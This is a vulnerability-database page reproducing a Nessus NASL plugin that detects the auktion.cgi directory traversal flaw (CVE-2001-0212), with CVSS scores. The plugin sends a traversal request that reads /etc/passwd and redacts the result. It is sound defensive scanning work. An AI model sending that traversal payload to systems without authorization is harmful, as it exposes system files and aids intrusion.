Lucene search
This script is Copyright (C) 2001-2021 and is owned by Tenable, Inc. or an Affiliate thereof.AUKTION_CGI.NASLHistoryMar 25, 2001 - 12:00 a.m.
HIS AUktion auktion.cgi Traversal Arbitrary Command Execution
2001-03-2500:00:00
This script is Copyright (C) 2001-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
49
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.534 Medium
EPSS
Percentile
97.6%
The ‘auktion.cgi’ cgi is installed. This CGI has a well known security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody).
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(10638);
script_bugtraq_id(2367);
script_version("1.31");
script_cve_id("CVE-2001-0212");
script_name(english:"HIS AUktion auktion.cgi Traversal Arbitrary Command Execution");
script_summary(english:"Checks for the presence of /cgi-bin/auktion.cgi");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is running an application that is affected by a
remote command execution vulnerability." );
script_set_attribute(attribute:"description", value:
"The 'auktion.cgi' cgi is installed. This CGI has a well known security
flaw that lets an attacker execute arbitrary commands with the
privileges of the http daemon (usually root or nobody)." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2001/Feb/64" );
script_set_attribute(attribute:"solution", value:
"There is no known solution at this time." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:U/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"plugin_publication_date", value: "2001/03/25");
script_set_attribute(attribute:"vuln_publication_date", value: "2001/02/12");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2001-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"CGI abuses");
script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("data_protection.inc");
port = get_http_port(default:80);
foreach d (cgi_dirs())
{
u = strcat(d, "/auktion.cgi?menue=../../../../../../../../../etc/passwd");
r = http_send_recv3(method:"GET", item: u, port:port, exit_on_fail: 1);
buf = strcat(r[0], r[1], '\r\n', r[2]);
if (egrep(pattern:".*root:.*:0:[01]:.*", string:buf))
{
buf = data_protection::redact_etc_passwd(output:buf);
extra = '\nThe following URL exhibits the flaw :\n'
+ build_url(port:port, qs: u) + '\n';
if (report_verbosity > 1)
extra += '\nIt produced the following output :\n' + buf + '\n';
security_hole(port:port, extra: extra);
exit(0);
}
}
Related
cvelist
cvelist
CVE-2001-0212
2001-03-09 05:00:00
nvd
nvd
CVE-2001-0212
2001-06-02 04:00:00
cve
cve
CVE-2001-0212
2001-06-02 04:00:00
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.534 Medium
EPSS
Percentile
97.6%
Related for AUKTION_CGI.NASL